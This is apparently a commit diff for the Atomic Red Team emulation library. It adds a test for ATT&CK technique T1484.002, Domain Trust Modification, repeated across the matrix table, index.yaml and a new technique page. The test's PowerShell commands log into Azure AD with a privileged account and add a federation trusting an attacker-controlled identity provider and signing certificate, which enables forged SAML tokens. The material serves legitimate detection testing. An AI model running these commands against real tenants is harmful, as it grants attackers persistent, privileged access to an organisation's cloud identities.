| | [Service Execution](../../T1569.002/T1569.002.md) | [Cron](../../T1053.003/T1053.003.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [LSA Secrets](../../T1003.004/T1003.004.md) | [Software Discovery](../../T1518/T1518.md) | | Network Device Configuration Dump [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Standard Port](../../T1571/T1571.md) | |
| | [Service Execution](../../T1569.002/T1569.002.md) | [Cron](../../T1053.003/T1053.003.md) | [Domain Trust Modification](../../T1484.002/T1484.002.md) | Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [LSA Secrets](../../T1003.004/T1003.004.md) | [Software Discovery](../../T1518/T1518.md) | | Network Device Configuration Dump [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Standard Port](../../T1571/T1571.md) | |
| | Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | [LSASS Memory](../../T1003.001/T1003.001.md) | [System Checks](../../T1497.001/T1497.001.md) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | [Software Deployment Tools](../../T1072/T1072.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | [Deploy Container](../../T1610/T1610.md) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [Direct Volume Access](../../T1006/T1006.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | System Location Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
@@ -41,7 +41,7 @@
| | [Windows Management Instrumentation](../../T1047/T1047.md) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Guessing](../../T1110.001/T1110.001.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Managers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | [Web Protocols](../../T1071.001/T1071.001.md) | |
| | | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Spraying](../../T1110.003/T1110.003.md) | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
| | | [External Remote Services](../../T1133/T1133.md) | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | | | | | | |
| | | [External Remote Services](../../T1133/T1133.md) | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | [Domain Trust Modification](../../T1484.002/T1484.002.md) | [Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | | | | | | |
| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Downgrade System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Private Keys](../../T1552.004/T1552.004.md) | | | | | | |
| | | Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Proc Filesystem](../../T1003.007/T1003.007.md) | | | | | | |
| | | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | [SAML Tokens](../../T1606.002/T1606.002.md) | | | | | | |
atomics/Indexes/index.yaml
+164 -2
View File
@@ -13134,7 +13134,88 @@ privilege-escalation:
- 'Active Directory: Active Directory Object Creation'
- 'Active Directory: Active Directory Object Modification'
- 'Command: Command Execution'
atomic_tests: []
identifier: T1484.002
atomic_tests:
- name: Add Federation to Azure AD
auto_generated_guid: 8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7
description: |
Add a new federation to Azure AD using PowerShell. The malicious Identity Provider to be added must be configured beforehand.
If ADFS is used as IdP, the Uris parameters can be found at 'https://<federationservice>.<domainname>.com/federationmetadata/2007-06/federationmetadata.xml'
supported_platforms:
- azure-ad
input_arguments:
azure_username:
description: Username of a privileged Azure AD account such as External
Identity Provider Administrator or Global Administrator roles
type: String
default: bruce.wayne@contosocloud.com
azure_password:
description: Password of azure_username
type: String
default: iamthebatman
active_logon_uri:
description: Active Logon Uri, available in federation metadata at <SingleSignOnService
Binding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST> field if ADFS
is used.
type: String
default: https://sts.contoso.com/adfs/ls/
issuer_uri:
description: Issuer Uri, available in federation metadata at the "entityID"
field if ADFS is used.
type: String
default: http://sts.contoso.com/adfs/services/trust
metadata_uri:
description: Metadata exchange Uri, available in federation metadata at
<Address xmlns="http://www.w3.org/2005/08/addressing"> field if ADFS is
used.
type: String
default: https://sts.contoso.com/adfs/services/trust/mex
public_key:
description: Public key of the X509 signing token certificate, in base64
type: String
default: MzAgODIgMDEgMGEgMD...gZWQgOTkgMDIgMDMgMDEgMDAgMDE=
domain_name:
description: New federation domain name
type: String
default: contoso.com
dependency_executor_name: powershell
dependencies:
- description: 'AzureADPreview Powershell module must be installed. The Identity
Provider to be federated must be configured (outside of the scope of this
test).
'
prereq_command: 'if (Get-Module AzureADPreview) {exit 0} else {exit 1}
'
get_prereq_command: 'Install-Module -Name AzureADPreview -Force
'
executor:
command: |
Import-Module AzureADPreview
$PWord = ConvertTo-SecureString -String "#{azure_password}" -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{azure_username}", $Pword
Connect-AzureAD -Credential $Credential > $null
$federationSettings = New-Object Microsoft.Open.AzureAD.Model.DomainFederationSettings
$federationSettings.ActiveLogOnUri = "#{active_logon_uri}"
$federationSettings.IssuerUri = "#{issuer_uri}"
$federationSettings.LogOffUri = $federationSettings.ActiveLogOnUri
$federationSettings.MetadataExchangeUri = "#{metadata_uri}"
$federationSettings.PassiveLogOnUri = $federationSettings.ActiveLogOnUri
$federationSettings.PreferredAuthenticationProtocol = "WsFed"
$federationSettings.SigningCertificate = "#{public_key}"
$new = New-AzureADExternalDomainFederation -ExternalDomainName "#{domain_name}" -FederationSettings $federationSettings
if ($new) { Write-Host "`nFederation successfully added to Azure AD" } else { Write-Host "`nThe federation setup failed" }
Get-AzureADExternalDomainFederation -ExternalDomainName "#{domain_name}"
Write-Host "End of federation configuration."
cleanup_command: |
Import-Module AzureADPreview
$PWord = ConvertTo-SecureString -String "#{azure_password}" -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{azure_username}", $Pword
Connect-AzureAD -Credential $Credential > $null
Remove-AzureADExternalFederationDomain -ExternalDomainName "#{domain_name}"
name: powershell
T1574.004:
technique:
id: attack-pattern--fc742192-19e3-466c-9eb5-964a97b29490
@@ -25689,7 +25770,88 @@ defense-evasion:
- 'Active Directory: Active Directory Object Creation'
- 'Active Directory: Active Directory Object Modification'
- 'Command: Command Execution'
atomic_tests: []
identifier: T1484.002
atomic_tests:
- name: Add Federation to Azure AD
auto_generated_guid: 8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7
description: |
Add a new federation to Azure AD using PowerShell. The malicious Identity Provider to be added must be configured beforehand.
If ADFS is used as IdP, the Uris parameters can be found at 'https://<federationservice>.<domainname>.com/federationmetadata/2007-06/federationmetadata.xml'
supported_platforms:
- azure-ad
input_arguments:
azure_username:
description: Username of a privileged Azure AD account such as External
Identity Provider Administrator or Global Administrator roles
type: String
default: bruce.wayne@contosocloud.com
azure_password:
description: Password of azure_username
type: String
default: iamthebatman
active_logon_uri:
description: Active Logon Uri, available in federation metadata at <SingleSignOnService
Binding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST> field if ADFS
is used.
type: String
default: https://sts.contoso.com/adfs/ls/
issuer_uri:
description: Issuer Uri, available in federation metadata at the "entityID"
field if ADFS is used.
type: String
default: http://sts.contoso.com/adfs/services/trust
metadata_uri:
description: Metadata exchange Uri, available in federation metadata at
<Address xmlns="http://www.w3.org/2005/08/addressing"> field if ADFS is
used.
type: String
default: https://sts.contoso.com/adfs/services/trust/mex
public_key:
description: Public key of the X509 signing token certificate, in base64
type: String
default: MzAgODIgMDEgMGEgMD...gZWQgOTkgMDIgMDMgMDEgMDAgMDE=
domain_name:
description: New federation domain name
type: String
default: contoso.com
dependency_executor_name: powershell
dependencies:
- description: 'AzureADPreview Powershell module must be installed. The Identity
Provider to be federated must be configured (outside of the scope of this
test).
'
prereq_command: 'if (Get-Module AzureADPreview) {exit 0} else {exit 1}
'
get_prereq_command: 'Install-Module -Name AzureADPreview -Force
'
executor:
command: |
Import-Module AzureADPreview
$PWord = ConvertTo-SecureString -String "#{azure_password}" -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{azure_username}", $Pword
Connect-AzureAD -Credential $Credential > $null
$federationSettings = New-Object Microsoft.Open.AzureAD.Model.DomainFederationSettings
$federationSettings.ActiveLogOnUri = "#{active_logon_uri}"
$federationSettings.IssuerUri = "#{issuer_uri}"
$federationSettings.LogOffUri = $federationSettings.ActiveLogOnUri
$federationSettings.MetadataExchangeUri = "#{metadata_uri}"
$federationSettings.PassiveLogOnUri = $federationSettings.ActiveLogOnUri
$federationSettings.PreferredAuthenticationProtocol = "WsFed"
$federationSettings.SigningCertificate = "#{public_key}"
$new = New-AzureADExternalDomainFederation -ExternalDomainName "#{domain_name}" -FederationSettings $federationSettings
if ($new) { Write-Host "`nFederation successfully added to Azure AD" } else { Write-Host "`nThe federation setup failed" }
Get-AzureADExternalDomainFederation -ExternalDomainName "#{domain_name}"
Write-Host "End of federation configuration."
cleanup_command: |
Import-Module AzureADPreview
$PWord = ConvertTo-SecureString -String "#{azure_password}" -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{azure_username}", $Pword
Connect-AzureAD -Credential $Credential > $null
Remove-AzureADExternalFederationDomain -ExternalDomainName "#{domain_name}"
name: powershell
T1601.002:
technique:
external_references:
atomics/T1484.002/T1484.002.md
+86
View File
@@ -0,0 +1,86 @@
# T1484.002 - Domain Trust Modification
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1484/002)
<blockquote>Adversaries may add new domain trusts or modify the properties of existing domain trusts to evade defenses and/or elevate privileges. Domain trust details, such as whether or not a domain is federated, allow authentication and authorization properties to apply between domains for the purpose of accessing shared resources.(Citation: Microsoft - Azure AD Federation) These trust objects may include accounts, credentials, and other authentication material applied to servers, tokens, and domains.
Manipulating the domain trusts may allow an adversary to escalate privileges and/or evade defenses by modifying settings to add objects which they control. For example, this may be used to forge [SAML Tokens](https://attack.mitre.org/techniques/T1606/002), without the need to compromise the signing certificate to forge new credentials. Instead, an adversary can manipulate domain trusts to add their own signing certificate.</blockquote>
## Atomic Tests
- [Atomic Test #1 - Add Federation to Azure AD](#atomic-test-1---add-federation-to-azure-ad)
<br/>
## Atomic Test #1 - Add Federation to Azure AD
Add a new federation to Azure AD using PowerShell. The malicious Identity Provider to be added must be configured beforehand.
If ADFS is used as IdP, the Uris parameters can be found at 'https://<federationservice>.<domainname>.com/federationmetadata/2007-06/federationmetadata.xml'
**Supported Platforms:** Azure-ad
**auto_generated_guid:** 8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| azure_username | Username of a privileged Azure AD account such as External Identity Provider Administrator or Global Administrator roles | String | bruce.wayne@contosocloud.com|
| azure_password | Password of azure_username | String | iamthebatman|
| active_logon_uri | Active Logon Uri, available in federation metadata at <SingleSignOnService Binding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST> field if ADFS is used. | String | https://sts.contoso.com/adfs/ls/|
| issuer_uri | Issuer Uri, available in federation metadata at the "entityID" field if ADFS is used. | String | http://sts.contoso.com/adfs/services/trust|
| metadata_uri | Metadata exchange Uri, available in federation metadata at <Address xmlns="http://www.w3.org/2005/08/addressing"> field if ADFS is used. | String | https://sts.contoso.com/adfs/services/trust/mex|
| public_key | Public key of the X509 signing token certificate, in base64 | String | MzAgODIgMDEgMGEgMD...gZWQgOTkgMDIgMDMgMDEgMDAgMDE=|
| domain_name | New federation domain name | String | contoso.com|
#### Attack Commands: Run with `powershell`!
```powershell
Import-Module AzureADPreview
$PWord = ConvertTo-SecureString -String "#{azure_password}" -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{azure_username}", $Pword
Connect-AzureAD -Credential $Credential > $null
$federationSettings = New-Object Microsoft.Open.AzureAD.Model.DomainFederationSettings
$federationSettings.ActiveLogOnUri = "#{active_logon_uri}"
$federationSettings.IssuerUri = "#{issuer_uri}"
$federationSettings.LogOffUri = $federationSettings.ActiveLogOnUri
$federationSettings.MetadataExchangeUri = "#{metadata_uri}"
$federationSettings.PassiveLogOnUri = $federationSettings.ActiveLogOnUri
$federationSettings.PreferredAuthenticationProtocol = "WsFed"
$federationSettings.SigningCertificate = "#{public_key}"
$new = New-AzureADExternalDomainFederation -ExternalDomainName "#{domain_name}" -FederationSettings $federationSettings
if ($new) { Write-Host "`nFederation successfully added to Azure AD" } else { Write-Host "`nThe federation setup failed" }
Get-AzureADExternalDomainFederation -ExternalDomainName "#{domain_name}"
Write-Host "End of federation configuration."
```
#### Cleanup Commands:
```powershell
Import-Module AzureADPreview
$PWord = ConvertTo-SecureString -String "#{azure_password}" -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{azure_username}", $Pword
Connect-AzureAD -Credential $Credential > $null
Remove-AzureADExternalFederationDomain -ExternalDomainName "#{domain_name}"
```
#### Dependencies: Run with `powershell`!
##### Description: AzureADPreview Powershell module must be installed. The Identity Provider to be federated must be configured (outside of the scope of this test).
##### Check Prereq Commands:
```powershell
if (Get-Module AzureADPreview) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
Install-Module -Name AzureADPreview -Force
```
<br/>